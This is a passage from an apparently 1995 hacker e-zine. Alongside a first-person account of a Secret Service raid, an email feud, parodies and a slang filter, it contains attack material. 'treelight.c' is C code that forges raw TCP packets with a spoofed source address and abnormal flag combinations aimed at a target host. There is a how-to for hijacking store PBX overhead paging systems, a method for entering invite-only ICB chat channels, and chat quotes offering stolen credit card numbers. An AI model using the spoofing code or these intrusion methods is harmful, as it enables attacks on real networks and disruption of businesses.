htons(dport); tcp.th_seq = htonl(seq); tcp.th_ack = htonl(ack); tcp.th_x2 = 0; tcp.th_off = 5; tcp.th_flags = flags; tcp.th_win = htons(10052); tcp.th_sum = 0; tcp.th_urp = 0; /* Add crap for our TCP checksum. */ memset(tcpbuf, 0, 8192); p = tcpbuf; memcpy(p, &(ip.saddr), 8); /* This will copy saddr & daddr into the buffer */ p += 9; /* Skip the 0 operator */ memcpy(p++, &(ip.protocol), 1); len = htons(datalen + sizeof(tcp)); memcpy(p, &(len), 2); p += 2; memcpy(p, &tcp, sizeof(tcp)+datalen); /* Now fill in the checksum. */ tcp.th_sum = in_cksum((char *)tcpbuf, sizeof(tcp)+12+datalen); /* Now we copy our packet into a nice character array for sending. */ memcpy(packet, (char *)&ip, sizeof(ip)); memcpy(packet+sizeof(ip), (char *)&tcp, sizeof(tcp)); memcpy(packet+sizeof(ip)+sizeof(tcp), (char *)data, datalen); /* And send... */ return(sendto(s, packet, sizeof(ip)+sizeof(tcp)+datalen, 0, (struct sockaddr *)sin, sizeof(struct sockaddr_in))); } /* Send faked UDP packet. */ int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport) struct sockaddr_in *sin; unsigned short int s, datalen, sport, dport; unsigned long int saddr, daddr; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; /* Fill in IP header values. */ ip.ihl = 5; ip.version = 4; ip.tos = 0; ip.tot_len = htons(28 + datalen); ip.id = htons(31337 + (rand()%100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum((char *)&ip, sizeof(ip)); /* Fill in UDP header values. Checksums are unnecassary. */ udp.source = htons(sport); udp.dest = htons(dport); udp.len = htons(8 + datalen); udp.check = (unsigned short int)NULL; /* Copy the headers into our character array. */ memcpy(packet, (char *)&ip, sizeof(ip)); memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp)); memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen); return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0, (struct sockaddr *)sin, sizeof(struct sockaddr_in))); } -- cut here -- treelight.c: #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pktsend.h" #define err(x) { fprintf(stderr, x); exit(1); } unsigned long int resolve(host) char host[255]; { unsigned long int addr; struct hostent *he; if((he = gethostbyname(host)) == NULL){ if((he = gethostbyaddr(host, strlen(host), AF_INET)) == NULL) return -1; } bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list)); return(addr); } void main(argc, argv) int argc; char **argv; { unsigned long int saddr, daddr; unsigned short int sport, dport; struct sockaddr_in sin; int s; if(argc!=5) err("Usage: treelight \n"); /* Resolve Addresses. */ if((saddr=resolve(argv[1])) == -1) err("Unable to resolve source address.\n"); if((daddr=resolve(argv[3])) == -1) err("Unable to resolve destination address.\n"); /* Convert port numbers to integers. */ sport=(unsigned short int)atoi(argv[2]); dport=(unsigned short int)atoi(argv[4]); /* Open raw socket. */ if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err("Unable to open raw socket.\n"); sin.sin_family = AF_INET; sin.sin_addr.s_addr= daddr; sin.sin_port = dport; if((sendpkt_tcp(&sin, s, "1", 1, saddr, daddr, sport, dport, TH_SYN|TH_URG|TH_PUSH|TH_FIN, 2387283, 2387238)) == -1) err("Error sending our rad little packet.\n"); } -- cut here -- <----------------------------------------------------------------------------> <----------------------------------------------------------------------------> Breakfast with the Secret Service by Kamakize September 8th 1995 6:42 am. The phone rings. I let it ring a few times, then roll over and pick it up only to hear a dial tone. I open my eyes and look over towards my caller-id box to see who it was. The display is blank, according to the machine, the phone never rang. Confused, but more concerned with sleep at the moment, I closed my eyes and drifted back to sle....BEWM, my door slams open. My head against my pillow, my eyes bulge as two large men enter my room and pronounce: "Secret Service". They each grab an arm and drag me down the stairs, while they informed me "cellular phone fraud is costing the United States one million dollars a day". Some days being a hacker is less fun than others. They started by asking me if anyone was home. They then slapped me with the warrant and let in about 4 local police officers from the county. They opened my parents room and said "Treasury Department" and grabbed them to the kitchen table, and then asked for all weapons in the house. Having unloaded the sole gun in the house, the search commenced. First they asked for cooperation, and started taking the basic information from me: Name, SSN, Address (WHY? WHY did they ask for the address, when they where at the damn place?), and all phone numbers of the house, plus releases to search the cars (a search warrant for a HOUSE does NOT include the cars or "out buildings" on your premises, only the main building). By the time they got us all down it was about 7:15am, and they started to ask basic questions that your school or any credit agency knows when you apply for something, (ie: employment history, ect.. wage at work, salary, ect.) Then, the Computer Expert from DC came in and started to fool with our family's business computer, and after scanning it, decided to let it be, since he found nothing wrong. Then they visited my room (without my presence) and searched my room somewhat half-ass, as if they weren't finding what they wanted. Finally, they gave up, since I never had what they were looking for to begin with. They took me outside, and started questioning me. They kept asking me WHERE is the EPROM burner, over and over, WHERE is the EPROM burner? Since there wasn't one, that line of questioning wasn't going very far. I told them I never cloned phones, and didn't know. They frowned. Then they started to ask me what I knew about PMF. At this time when they out of the blue said "PMF", I suddenly knew why they were there. I had an account on his board, and had downloaded how-to files on cloning phones. Well, information isn't illegal, but apparently it is enough for a search warrant. I was taken outside countless times, and around 11:00am they let me sit down and wait out the remainder of their search. They never once looked at my computer on-line, not once. But finally, around 12:30pm they brought me up to my room to show me what they were going to take with them; at 12:45pm they left. September 18th, two weeks after the search, they had me go downtown to "sign a few papers and documents." I have yet to hear a word back, and apparently the people in New Jersey working on the case are not talking much. That day, the agents told me that they would get back to us before christmas. Christmas has come and gone. Six people were arrested in "Cybersnare", but there have not been any arrests after that day. They were after people for cell phone cloning, and for selling actual credit cards. It was all a result of people using Celco 51, for more information about that read the article in FEH #2; a brief outline is provided below. In January of 1995, PMF came onto irc, pushing his bbs, demanding that you prove you can get on by showing your knowledge of cell phones. In reality, it wasn't PMF at all that was really running the board, it was 'Carder One' that was behind it. It was set up in PMF's apartment building, and he took care of it snitching on whatever. In june, he went to Summercon '95 (a public hacker convention), alot of his 'friends' were there.. but they didn't know until 3 months later, he would turn the table over. While he was there he had 2 cellular phones, he showed me one. While outside on the street in atlanta, i asked him 'is that legit?' He promptly said "What do you think?". I asked him again. That was ONE question he would never answer. Now we know. Possessions seized from me: 9/8/95 - 6:40am Date + Time warrant served. 1) packard bell monitor mode # and serial # listed 1) computer - CTG (no serial #) 1) model 5001 focus keyboard serial # 1) PC concepts mt 767 - power director Serial # 1) HP desk Jet 500C serial # 1) Caller Identification box - slim light , model #64 103) 3.5" floppy diskettes Miscellaneous cables and connectors 4) boxes removed from car, misc documents 1) book: "Internet firewalls and network security" Thats all. Wierd eh? Taking the power director. Taking an ink jet, when asked why the guy said so we can tell if you printed these documents here, I said from an INK JET? (hmmm makes me wonder if the goverment has high technology to summon ink back into a cart and see if it matches the same ink in the cart). Over all there was one nice agent there, he did talk about the SS some while the others did there duty. They were there for about 7 hours, with a few county cops coming and going. Strange, the raid didnt seem as "scary" as it should have been. Two weeks later the media came calling to me. 2 weeks. <----------------------------------------------------------------------------> --------------------------------------------------------------------- I'm a Hacker, You're a Hacker, wouldn't you like to be a Hacker too.. - Some thoughts from Mythrandir --------------------------------------------------------------------- Hackers are everywhere. They are in the news. They are in the media. They are on the news groups. They are on IRC. And they are multiplying at an exponential rate. Right?... Nope. But this is the way that the world sees it. This is the way that the policy makers view the situation. This is the way that all of these so called new hackers believe is happening. The revolution is here! Let's cause havoc and fight the system. Destroy big brother. We can free the information. We can liberate. Let's hack into machines with all of these scripts that are around. Let's get information from everyone. We can get free access to AOL. We can steal money from people. We can take whatever we want. We are elite. Right?... Nope. What in the world is happening? Of course it is quite simple. Hacking has moved into the mainstream. It has been glamourized by the media. It is almost a household word. I wouldn't be surprised if we get trading cards. It'd be more interesting than the OJ Simpson trading cards.. Because of this, everyone is thinking that "hacking" is cool. It seems like every kid in the country wants to be a hacker. Everyone is building redboxes and running AOHell. With all of this, I think it is time for a little re-education. You see it is real simple. So simple that it defies so many. Tools do not make a hacker. Breaking into machines does not make you a hacker. Talking like you are elite does not make you a hacker. Only one thing makes you a hacker. Your Mind. Be Elite, think first, ask questions later. - Mythrandir mythrndr@infonexus.com <----------------------------------------------------------------------------> Gray Areas Who's On Your Side? by FEH Staff "I didn't have anything against her until she threatened me." -Emmanuel Goldstein It is not all fun and games when you are publishing a hacker oriented zine for profit. Two of the most well known, 2600 and Gray Areas, after what seemed like outward respect for each other, has fallen into name calling and threats. Netta has threatened to take this to the people, so here they are... Date: Tue, 14 Nov 95 01:21 EST From: grayarea@gti.net (Gray Areas Inc.) To: emmanuel@2600.com Subject: shame Status: RO it's a shame u did not tell me u4ea calls ur home on a friendly basis to talk to phiber who i believe is still on federal probation. please answer this before i take it public on the net. it's one thing for dennis and u4ea to fuck with me and my company. it's far another for you to be AT ALL involved in it. my logs show u message dennis every time he's on irc trying to get in better with him. i am not at all pleased to see the pieces of the puzzle fitting together as if you are befriending them so they will fuck with me and my company instead of you and yours. i've stuck up for you when people wanted to fuck you up. i wish you had the sense to at least stay out of this, or to have been truthful with me that you have chosen to side with them. p.s. this mail is intended for your eyes only. my last two calls to you were discussed with other people. if you wanna discuss my bsuiness with kc and your other friends, rest assured i'll tell (severe threats omitted). --- Date: Tue, 14 Nov 95 01:35 EST From: grayarea@gti.net (Gray Areas Inc.) To: emmanuel@2600.com Subject: Re: shame Status: RO um, no. u seem to like the idea of me giving you what i have. it's a one-way street. it's enuf to say "phiber is wigging out at that memory of yours." i've done all of the talking to you i'm ever gonna be able to do i guess. as for what your involvment is, that's what i offered you the opportunity to comment on before this went further. i'll now let other people decide. there are LOTS of people interested in both you and phiber. you of all people should know that everything you do in this scene is practically public record and that interfering with the existance of another publication is a serious legal matter. --- From: Emmanuel Goldstein Subject: Re: shame To: grayarea@gti.net (Gray Areas Inc.) Date: Tue, 14 Nov 1995 01:46:06 -0500 (EST) well, then you leave me little choice. from what i can see, you're either writing your own fiction now or you've been duped by somebody else. either way, i cannot allow you to threaten friends of mine with this nonsense. i strongly suggest you tell me specifically what you're talking about before this gets out of control. --- <----------------------------------------------------------------------------> <----------------------------------------------------------------------------> ******************************************************* *** FEH Eleet Quotes for the month of December 1995 *** *** Assembled By SnoNinja *** ******************************************************* at least i have a real life cheeseball: I am working on unix not linux PMF is the best hacker I know <|al|> everyone will be elite for 15 minutes. i'll hack your FBI computer in a second! i wanna be associated with golden showers I contract some of my coding out to SnoNinja *Vision23* listen ReD, you're a fucking punk. I don't have the time to waste figuring out how to ICMP bomb whatever machine you're on, so for now I'll have to settle for words. You're a real popular name. So noone will suspect it was me who committed digital murder. <_X> it took me 15 minutes to remember someones name FEH HAS LESS USEFUL INPHO THAN ALL OTHER ELECTRONIC MAGAZINES COMBINED hey anyone here willling to trade aol accounts for cc#'s? <-[ReDragon]-> don't do that this could be a *Really* Stupid question, but im trying to get password file here at the U of A, and ive tryed in all the places where text files say to look, and so far all ive been able to find is /etc/passwd. that may look to be the correct thing.. try not to op fools. Anyone want to trade "sitez" (Ftp site with pirated comercial software) or CC's (Stolen Credit Card Information), msg me. Let's talk. how can i make a war games dialer? im looking for phiber_optik... have you seen him lately?? * begin quote exactly. FEH is too closely scrutinized, too high profile YER ARTICLE ON INFILTRATING GOVERNMENT SITES ROOLZ BUGS oh well, there is always plausible deniability to fall back on * end quote LEMME IN FEH 4 OR I'M NOT GIVING YOU ANY AFRO GREEZE <_X> -r-x------ 1 root root 698170 May 18 1995 free.org.passwd* I got a program, 64,000 linez of code, and it does nothing not bad at least it compiles clean FEH is dope I am whoring myself for quotes *Crax* IF YOU DIE I'LL REFUND YER MONEY * begin quote Why would you rm any site? cuz I am a fucking gangster * end quote no one can be as lame as me linux is the mac daddy os.. but not on a mac [BigAl:bigal@carroll.com] hey dude you a pro? I need help [wierd:bob@netaccess.on.ca] feh kicks ass, i am just a beginner now, but one day i will be great *monk202* Feh cracks me up. I LOVE IT! This is what Phrack should've been... <----------------------------------------------------------------------------> ---=== T H E ===--- -- -- -- ---- -- -- -- -- -- -- -- -- --- -- -- -- --- --- -- -- -- - --- -- -- ---- -- -- -- ---=== L I S T ===--- Allen 3. Smith Greetz to: all the homies hangin w/ the cool posse. Nigs in the house. 007, james kahn, marissa tomei, 8o8 state, 011-posse, the leets, e-paq, all the j00s, whatney's cream stout, aol lamerz, all bofh's, phase dist, optik n3rve, BNF, Kleene, feynman, turing, shannon, nyquist, kernighan, pike, VSB, QAM, NRZ, and most of all to the #hack chicks. word werd wird wurd w1rd w3rd w0rd whord wherd whird wh1rd wh3rd wh0rd wirred w1rred worred w0rred wirr3d w1rr3d worr3d w0rr3d whirred wh1rred whorred wh0rred whirr3d wh1rr3d whorr3d wh0rr3d <----------------------------------------------------------------------------> Mac's Vs. PC's Artikle By nicotine (The one that hangz on #hack not #korea) aka `nic0tine wh4zz4p:x0x,xgirl,redragon,katana,mudman,snoninja,l0ra,vampirella,lynch, tigger,ice-9,roach,kemo,strict9,hosaka,andtherestofthehappy#hackfamily. Listen to this. This has been a long debate of people, basicly the result is that the people that want it easy but more expensive and not as much software choose makz, and the people that want it hard but less expensive and lots more software choose pc's, but now sience the "PC Echange" for makz can change shit over its kinda changed... makz are better for webin' and aol and pc's for hacking and shit. PC's Very Own Debate: "Forget That Makz Are Lame" from "The Real Cyberpunk Fake Book": Macs are easy, but they insulate you from the gory component-level HARDWARE hackery, and it's all the kard swapping, IRQ fiddling, dipswitch setting, chip pulling, and tooth gnashing that make the intel based PC world very cyberpunk (haqr like). Using a mak makes it a hurl of a lot harder to achive deep geekhood, and you're far less likely to build up really neat piles of old interface kardz, motherboards, and obsolete hard drives. (Although maks have thier own tools JUST TO OPEN THEM UP which you could leave around looking like you are doing a open heart surgury.) Also, you never hear of people building macs from the 3 various catalogs and from the dumpster behind Joe's Bait and Chip shop. YOU CAN DO THIS WITH PC'S, and any extra parts around your apartment around your home and give it that hacker feeling. Novelist Umberto Eco compared the mac operating system to the Catholic church. Belivers (Users) Must approach god (the hardware) through a thick layer of churchy inderection and simplifacation (icons, symbols, point-and-click), while DOS is very Protestant--you're responsible for achieving ON YOUR OWN, damn it, and confess your sins DIRECTLY to GOD, AND NO KISSY FACED ICONS BETWEEN. -THE END- ----------------------------------------------------------------------------- ICB hacking There is a chat program called ICB (Internet Citizens Band). Lots of times there is an invite only channel and I will Explain to you how to get into one without being invited. First you must monitor the channel and wait until someone leaves (signs off) and then change your nick to what thier nick WAS. Enter the channel. How this works: The ICB server keeps a list of people who are invited into the channel. It keeps their nick, not their address, so if anyone enters the invite only channel then it will think it iz them. comments? questions? pizza? sex? talk? nicotine@deeptht.armory.com <----------------------------------------------------------------------------> How Tew Hax0r An ATM Macheene by shadow tao tew buyld aye tao-box yew will need: 1. a beeg kardbord box. (get one that had a cold-macheene or a sw1shee-woosh-woosh macheene) 2. sum sizzors. 3. a voyce. 4. sum crayons. (prufurablee 486/60 cray-olas.) 5. a red box. 6. a dollor b1ll. ok!@ get da big box (nota big redboxdumbass!) and kutt slits inda front and draw on it like dis: _______________________ /______________________/| | maytag atm dood! || | ==== <-------- card sl1tt!! |free || |warez! xxx <------------tape red bocx here!@# | xxx || |qw1k xxx || |kash! || | ==== <-------- kash sl1tt!! |______________________|/ okay! now that you have done this! hide in the box and wait for sukkerrz!!! wen the sukkerz put ther kard in! wate forr the kodez!! if joo donut here da kode! say: "um...please speak the kode into da box..er...atm." but! besure that you say it in a robotvoyce or dey will call da pigz! once joo gotda kodes, steek the doller out da kash sl1tt adn say: "boopboopboop! macheene errer! pleeze go away!!!!!!" wate for sukkerr to leeve adn run adn useda kodez! runrunrun! da sukkerrz got da gunz! if he dosnot go away adn wonts his kardd bak say: "um. no." if he still won't go away - offer h1m warez! dont put da box in da rode! yu wil be run over! if peepul see yu in da box say yu are da magic atm elf! offer dem warez! <----------------------------------------------------------------------------> .--[An official]----------------------. : .-----. .-----. .--.--. : : : .--' : .--' : : : : !_-:: : `--. : `--. : . : ::-_! :~-:: :: .--' :: .--' :: : ::-~: : ::.: ::.`--. ::.: : : : `--' `-----' `--'--' : `----------------------[Production]---' (pretty phat ascii eh?) Title: Department store PBX overhead paging for the elite Author: Tele Monster (telmnstr) (tm) 1. Intro -------- HAVE YOU EVER BEEN INTO A DEPARTMENT STORE AND GOT TIRED OF HEARING SOME RASPY HOMEGIRL UP FRONT TALKING OVER THE INTERCOM. SECURITY TO BLOCK 12A. WE GOT SOME LOST BRAT NAMED MICHELLE AT COURTESY DESK. SOMEONE TO THE ELECTRONICS DEPARTMENT. BOOOOP. NOW ITS _YOUR_ TURN TO TAKE TO THE INTERCOM AND SPILL YOUR THOUGHTS. THATS RIGHT, TELL THAT OLD WAL*MART GREETER WHAT YOU THINK OF HIM, AND HOW HE WON'T GREET TEENAGERS BECAUSE HE THINKS THEY ARE ALL SPOILED SCUM. TELL THAT BITCH THAT WON'T HELP YOU IN THE ELECTRONICS DEPARTMENT THAT SHE IS UNOFFICIALLY FIRED. LAY OFF THE ENTIRE STAFF. USE YOUR IMAGINATION. 2. How ------ First you must go into your store of choice. After inside scope out the camera bubbles and how many cops are there. This generally doesn't matter as they don't care who says what over the intercom. There isn't a law that says you can't talk on the phones provided in the isles. (There is however a law that says no shouting fire in a theatre, keep that in mind. This also applies to no shouting fire in a wall*mart. Opps. This is too new school.) NOW YOU MUST FIND THE TELEPHONES. THESE ARE GENERALLY ON A POLE THAT SUPPORTS THE ROOF. GOOD THING THOSE POLES ARE THERE, EH? ANYWAYS. IN MANY STORES THEY MARK THE POLE AT THE TOP SO YOU CAN SEE IT ALL OVER. THE ONES WITH FIRE EXTINGUISHERS ARE NORMALLY MARKED WITH A RED ARROW OR RED LINE AROUND THE TOP. WALL*MART MARKS THEIR TELEPHONE POLES (HAHA) WITH A BLUE BAND AROUND THE TOP. THE OTHER TWO STORES (REMEMBER THEY ARE GENERALLY REGIONAL SO NO USE IN TALKING ABOUT THOSE SPECIFICALLY HERE) FOLLOW THE SAME WAY EXCEPT IT IS A BLUE ARROW POINTING DOWNWARD WITH "PHONE" WRITTEN ON IT. W0RD. (lets take it to the really really old school) NOW YOU MUST DETER-MINE THE TYPE OF TELEPHONE SYSTEM USED. SOME POPULAR ONES ARE NORTHERN TELECOM MERIDIAN SYSTEMS AS WELL AS COMDIAL. AT&T SPIRIT AND MERLIN SYSTEMS MAY BE USED, BUT THEY ARE GENERALLY AVOIDED BECAUSE OF AT&T'S GREED. THEY ARE JUST TOO EXPENSIVE. ROLM/SIEMENS AND TOSHIBA ARE SOME MORE POPULAR BRANDS. ONCE AGAIN ROLM IS GENERALLY FOR BIG PLACES, NOT BOBOSQUATNOT STORES. ANYWAYS ONCE YOU SCOPE OUT YOUR TELEPHONE YOU MUST THEN FIGURE OUT TO GET ON THE OVERHEAD. SOME STORES ACTUALLY HAVE WHAT LOOKS LIKE JUST A NORMAL TELEPHONE HOOKED TO THE KSU. THIS REALLY SUCKS WHEN THIS HAPPENS. Hopefully there will be and extension list next to, under or on the handset. Look for PAGE, OVERHEAD or anything close (PGE, OVRHEAD). Intercom is generally for station to station communication. They might just plug the audio amplifier into one of the extensions, it depends. Generally though, there will be this BIG PHAT button that says... PAGE. On the comdial systems, you will notice that there might be a light under the button or over the button that comes on when someone talks over the overhead. Look on the other phones to see if an arrow appears on the LCD screen or led lights when they talk. This can easily narrow it down. If you are on a normal bobo handset just dial something and when you get someone ask, "What is the extension for the overhead page." "69 why who is this?" "thank you " .. Pick up romp on the 69 and kwakbam. Jibbie jibbie jibbie jibbie. (I lost the old school touch) I forgot where I was... hmmm. Anyways. If it is the Meridian (Awwyea) system, and the key isn't labeled, keep hiting all of the buttons until you hear yourself grunting twelve times as loud. Generally Wall*Mart phones have somewhat of a low audio level over the page. The Meridian at Hills department store is really loud, as they use the outside paging horns as the speakers. The louder the more funny, but you gotta do it with attitude or else it is easy to start lauging. It sounds pretty pathedic to the normals in the store when they hear, "Hi you hahahah bahahahahah boop" One wall*mart near us converted over to the old style telephones (No buttons, just a normal 12 key keypad.. still on a pbx though) because of problems of unauthorized overhead paging (that just sounds funny). If you are REALLY BALLSY and these phones used a standard 2 line hybrid interface into the pbx, you could go open up a cordless phone, plug it in for 20 minutes while you hang out and jam Just Like Heaven on the toy pianos as the NiCad recharges. Then plug the cordless in where the phone was (check first to make shure it isnt a RJ-45 connector. If all else fails, the cordless will fry). If all does go well.. muhahah wireless mobile unauthorized overhead paging in a bobo squatnot store. (and hey, you didn't STEAL the phone cause its still in the store). 3. What to say -------------- This is the hardest part. What to say. If your a little twelve year old you might just burp in the thing or something. But if your a little older you can only display your wrath of eliteness thru what you say and how you say it. "Yo wally world shoppers, You are the grand prize Winna!@# For the next 10 minutes everything in the store you can fit in two shopping carts is yours free. Limit one computer and sofa per customer. GO!" (Bam. Every wallmart shopper kicks into supermarket sweep mode.) ** This might count as yelling Fire in a Wall*Mart. So contact your nearest lawyer for some consultation first. :) If you care. *** This hasn't been tested yet. **** If you do it, tell me how it goes. ***** The host of supermarket sweep is sum guy with a sweater, Thanks to h0trod for this info. One case we did do in which we were caught was at a going out of sale at a biglots store. They sell excess invetory, and have no sense of humor. The conversation wen't like this: over pa> "boop. Hi. MOM? MOM? ARE YOU THERE? No no I can't hear you" Guy walks up from behind. Taps thy on the shoulders. over pa> "Huh?" Guy "See that exit door right there?" over pa> "yea" guy "I want to see you on the otherr side" over pa> "Oh. so leave?" guy nods yes. That is the WORSE thing that has ever happened when pa'ing. Its not illegal to do stupid stuff like that. Another one in a wally whirrled (wall*mart) "Hi. I'd like to take this moment to mention that you all suck" >"Security to sector 120" "Cancel that security, go to sector Z. There isn't a problem" Other lines that have been said: "Aww yea 240 dolla's worth of puddin. At a wally world sale" "Despite all my rage I still end up on the hills overhead page" If you have wussy friends, they tend to run when you start talking. It is most hilarious if there are non-employee shoppers all in the isle when you pick up and scream. They just give you that look and some of them smile and laugh and stuff. 4. Quick reference to found pa/pbx systems ------------------------------------------ .---------------.----------------------.-------------------------------. : Store : PBX Brand : To initiate page : `---------------'----------------------'-------------------------------' Wall*Mart Comdial PAGE button Macys Unknown ?? Sams Comdial PAGE button Sears Unknown ?? HQ Warehouse Toshiba ?? FAO Shwartz Unkown ?? Lowes Meridian ?? Caldors Unknown ?? Hills Meridian PAGE button Taco Bell Unknown ?? K-mart Unknown (standard) 66 BJ's Unknown ?? * This can all change depending on what store and who installed there telecom system. The don't have to contract it out on a national basis. 5. Other goofy ideas -------------------- * Take an old walkman and add a rj-14 or whatever the hell the handset connector is. Pin it out so that the audio from the walkman is piped into the mic leads of the phone. Carry it in there and plug it in in place of the handset. Take the handset and chuck it behind the maxi's pop page press play and adujust the audio so its clear. * If you notice a nasty HUMMM noise on the pa, go to the customer service desk after you say all of that mess, and notify them that they have an audio isolation problem. Tell them they should put a isolation transformer on the ac line or between the amp and pbx system. Tell them there may be some signal loss using a transformer on the audio line but with the shitty quality it doesn't matter anyways. Generally the hum is at 60 hertz (same as AC line power). Greetz:CasretCgRedragonLoqDhateBl0keIppy bah. im tired of this UhermW1ldMrhydeMisfitMr804MotherU4eaD_D article. so this is the ErikbEmmanuelYomammaTheeJokerJulietOphie e n d. LANshark][cemanGentry|al|t3AlbatrossMooks GlennntsSet0nchmawdteklordVainrst0bias sn0crashsnoNinjaXgirlL0raX,Y,Z,Aborted and CYN0BYTE!@# <----------------------------------------------------------------------------> The Tales of oof.- (c) 1995 t3 Incorporated. Once upon a shining tooth, I witnessed thee his name was oof. He spoke to me in lore of old, about a land covered with mold. It spawned small creatures, all shapes and sizes, some of them looked like cereal surprises. They spoke a tongue called ancient foo, reveled across the land, and when the words were spoken true, you knew who was in command. These creatures came from miles around, to here the minister speak, sometimes a few of the souls would ask "do you know how to phreak?" Then oof would roar with a thunderous laugh, and wave his magic wand, a flash of lightning and a puft of smoke, and suddenly the creature was gone. The creatures came to understand, that sir oof was their own true god, and when he heard them chanting so, he bowed his head to nod. And so this tale winds to an end, with the master pleased with me, I feel a sense of warmness when, oof speaks to me. <----------------------------------------------------------------------------> The Elite Speak Filter by SnoCrash /* u4ea_filter 1.06 -- SnoCrash[FEH] */ /* Just start this up and paste lines of baffling u4ea-speak in. */ /* Nearly recognizable English text will pop out! */ /* Since u4ea-speak changes nearly every day, please send your */ /* additions to: snocrash@hackerz.org or snoninja@pussy.org */ /* compiles with: gcc -O2 -Wall -o u4ea_filter -s u4ea_filter.c */ /* Usage example: */ /* echo "y00 4r3 cl00l3$$, sn0d0rk" | u4ea_filter */ /* would produce: */ /* you are clueless snodork */ #include #include #include #define usage() { fprintf(stderr, "Usage: %s [infile] [outfile]\n", argv[0]); exit(1); } FILE *out; void filter_word(word) register char word[100]; { /* Some of u4ea's favorite words. */ if(!strncmp(word, "klooless", 8)) fprintf(out, "clueless"); else if(!strncmp(word, "clooless", 8)) fprintf(out, "clueless"); else if(!strncmp(word, "layme", 5)) fprintf(out, "lame"); else if(!strncmp(word, "joo", 3)) fprintf(out, "you"); else if(!strncmp(word, "o-day", 5)) fprintf(out, "0-day"); else if(!strncmp(word, "fook", 4)) fprintf(out, "fuck"); else if(!strncmp(word, "yoo", 3)) fprintf(out, "you"); else if(!strncmp(word, "uaea", 4)) fprintf(out, "u4ea"); else if(!strncmp(word, "kodez", 5)) fprintf(out, "codes"); else if(!strncmp(word, "lozer", 5)) fprintf(out, "loser"); else if(!strncmp(word, "uze", 3)) fprintf(out, "use"); else if(!strncmp(word, "uzer", 4)) fprintf(out, "user"); else if(!strncmp(word, "gno", 3)) fprintf(out, "no"); else if(!strncmp(word, "dood", 4)) fprintf(out, "dude"); else if(!strncmp(word, "donut", 5)) fprintf(out, "don't"); else if(!strncmp(word, "m4h", 3)) fprintf(out, "my"); else if(!strncmp(word, "iz", 2)) fprintf(out, "is"); else if(!strncmp(word, "stewpid", 7)) fprintf(out, "stupid"); else if(!strncmp(word, "reaiiy", 6)) fprintf(out, "really"); else if(!strncmp(word, "klueless", 8)) fprintf(out, "clueless"); else if(!strncmp(word, "kan", 3)) fprintf(out, "can"); else if(!strncmp(word, "wewp", 4)) fprintf(out, "woop"); else if(!strncmp(word, "telko", 5)) fprintf(out, "telco"); else if(!strncmp(word, "eye", 3)) fprintf(out, "i"); else if(!strncmp(word, "chooze", 6)) fprintf(out, "choose"); else if(!strncmp(word, "eleet", 5)) fprintf(out, "elite"); else if(!strncmp(word, "muzt", 4)) fprintf(out, "must"); else if(!strncmp(word, "buzy", 4)) fprintf(out, "busy"); else if(!strncmp(word, "ewe", 3)) fprintf(out, "you"); else if(!strncmp(word, "tew", 3)) fprintf(out, "too"); else if(!strncmp(word, "muh", 3)) fprintf(out, "my"); else if(!strncmp(word, "pheel", 5)) fprintf(out, "feel"); else if(!strncmp(word, "oph", 3)) fprintf(out, "of"); else if(!strncmp(word, "giph", 4)) fprintf(out, "give"); else if(!strncmp(word, "sum", 3)) fprintf(out, "some"); else if(!strncmp(word, "timez", 5)) fprintf(out, "times"); else if(!strncmp(word, "gewd", 4)) fprintf(out, "good"); else if(!strncmp(word, "ur", 2)) fprintf(out, "you're"); else if(!strncmp(word, "fuqed", 5)) fprintf(out, "fucked"); else if(!strncmp(word, "yer", 3)) fprintf(out, "your"); else if(!strncmp(word, "rox", 3)) fprintf(out, "rock"); else if(!strncmp(word, "yew", 3)) fprintf(out, "you"); else fprintf(out, "%s", word); } void main(argc, argv) int argc; char **argv; { FILE *in; char buf[100]; register char *t; register int i; if(argc == 3){ if((in = fopen(argv[1], "r")) == NULL) usage(); if((out = fopen(argv[2], "w")) == NULL) usage(); }else if(argc == 2){ out = stdout; if((in = fopen(argv[1], "r")) == NULL) usage(); }else{ in = stdin; out = stdout; } while((fgets(buf, 99, in))){ for(i=0;i A Lamer's Review of DefCon by Zeed You don't know how happy I was when I saw you come into #devo. I couldn't believe my eyes. I had been trying to find out your email address from just about everybody. Well, now I know it ;) How was your summer? I remember you said it was pretty cool. My summer was my trip to CA, AZ, NV. For the first 2 weeks, I stayed in California. I went to the beach, went to trendy coffee houses, played pool in smoke infested game parlors, visited old friends, went to malls, cruised around, talked to people on the phone, spent money, etc.. It was fun, I was with my friend Brian most of the time. (You spoke to him on the phone) I didn't meet Jill or Tiffany. Each for different reasons. Jill didn't come to CA until like 2 days before I was to leave CA, and Tiffany was 9 hours away and every time I tried to call her she was never home. I think you were the only online friend I called the whole time I was there, well Jill called me once. Anyways, I am so glad I got to talk to you. When I was in CA, I went and saw some of the old houses I used to live in. We drove by ,my old friend, Mile's house. I don't know if it was good timing but he was outside and we stopped and talked to him. It had been ages since I had talked to him. My friend Brian is off in AZ at a technical school called, "High-tech institute". It's a 1 year degree in eletronics I think. Then he is going to Australia for a year. His dad is Australian. He is turning into a party animal, hehe. Those damn roomates of his ;) Hmm, lets see.... Well here is the defcon summary. Ryan, Brian and I arrived in Las Vegas around 5:00pm thursday afternoon.. I got our hotel room and got all our bags in the room. At like 8pm we drove to the Airport to pick up Melanie, Jake and maybe Brett (if he showed). Well first we went to Melanie's gate and soon we met up with Jake. We both recognized each other cause we had each others pics. The Melanie's flight came in. She met us all and then we were off to the Hotel. The first night we just talked a lot in my room, then we all went to eat at some restuarant at the Excaliber. We talked a lot there. Jake was really funny, he is out going and had all kinds of funny stories. Btw, Brian, Ryan and I are all 18. Jake is 21, and Melanie was 23. Well we came back to the hotel we went for the Casino. Jake got some beer and he got one for Ryan. Melanie went off to play the Quarter slots, and Jake went to Drink and play video poker. Brian and Ryan were being told to leave the casino cause they weren't 21, so I gave Brian a key and I went to where Melanie was playing the slots. I played them too, for a while. Personaly, I don't see how anybody could get addicted to it. hehe, maybe thats cause I have a slot machine in my room ;) Melanie was doing pretty weel actually. We just played and played, until one of the old ladies asked if I was 